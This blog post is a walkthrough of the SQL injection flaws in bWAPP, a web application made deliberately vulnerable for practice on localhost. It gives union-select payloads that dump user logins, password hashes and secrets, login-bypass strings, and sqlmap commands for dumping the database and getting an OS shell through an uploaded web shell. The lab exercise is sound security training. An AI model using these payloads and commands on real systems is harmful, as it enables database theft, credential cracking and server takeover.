bWAPP Sql Injection

Posted by Security is just an illusion at Tuesday, January 14, 2014 Read our previous post

 

 

 

bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.

 

bWAPP sql Injection

Part 1-4 Low

/Sql Injection - Search page/
/Sql Injection - Select page/

/Sql Injection - Login page/

/Sql Injection - Blind SQL injection page/

 

Currently there are 5 bugs in bWAPP related to SQL injection:

1. the Search page,
   
   where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
2. the Select page,
   
   where you can select a specific movie from a drop-down list.
3. the Login page,
   
   where you can enter your credentials to login.
4. the Blind SQL injection page,
   
   where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
    
5. and where is bug number 5?
   
   A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where.

Sql Injection - Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.

     

 

The injection symptoms: when entering a single quote (') in the title field we receive the following message:   'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'   I love that message!
Here we go for some basic SQL injection fun:   blah' or 1=1--   results in all the records:

     

blah' or 1=2--   results in 0 records:

 

So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search

What's next? Do you want to view some data not intended for you?I mean some real confidential information! Of course you want, let's go...

You could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement!

blah' union select 1--

results in the following message:

   

After a while you will discover that you should use 6 columns:
 
blah' union select 1,1,1,1,1,1--

results in:

 

And that's great!Now we can play with the field order and visualize the current database version:

blah' union select 1,DATABASE(),1,1,1,1--

 
 

We have found the name the of the current database name:bWAPP
Now our mission is to retrieve the table names of the current database:
  blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--

 

We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the tableusers:
  blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--

 

The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--

 

OK, we have the values! We exploited the underlying database by retrieving some confidential data.Apparently it seems that the password value is stored in a hashed state and cannot be retrieved. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p
 

Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will takeover the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.

 

We can automate the previous commands with sqlmap.
This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs

    

This dumps the table fields, it even cracks automatically the passwords:

 

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" -D bWAPP -T users -C login,email,password,secret --dump

 

   

Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!   ./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell

       

 

 

Sql Injection - Select page

 

Tools Used : Firefox Addon Hackbar

 

Select a move and check the url.

 

movie=1 whats happen if we try to change the url to movie=1' ?

 

 

We got a Sql Error well done i love this message

 

Now i try Union Select Statement to check the columns.

 

Wrong nr of columns blablabla ,time to cut some columns.

 

Well done 6 columns But the output sucks nwo change the movie id to = 0

for better view of tables.

4x Sql Injection Points @ #2#3#5#4 now time to add some sql commands

Into @2 we add user() @3 database() @4 version()

 

Well done

 

Sql Injection - Login page

Info : Insecure Login Form

Login :

 

Bypass :

 

 

User :Superhero' or1=1 or 'a'='a

Password : ' or 1=1-- -
Welcome Neo ...

 

More examples:

Superhero' or 1=1 or '
Superhero' or 'a'='a' or '

Superhero' or '
Superhero' or 1=1 and '
Superhero' or 'a'='a

Well Done

 

SQL Injection - Blind

 

 

 

We can automate this with sqlmap.

Get Tamper or other tool to grab your cookie.

 

Pentest with sqlmap :

 

./sqlmap.py -u "http://localhost/bWAPP/sqli_4.php?title=Iron+Man&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs

Sqlmap Found Payload

Get the database user and the hashedpassword after we got it time to crack the hashfile.

Well done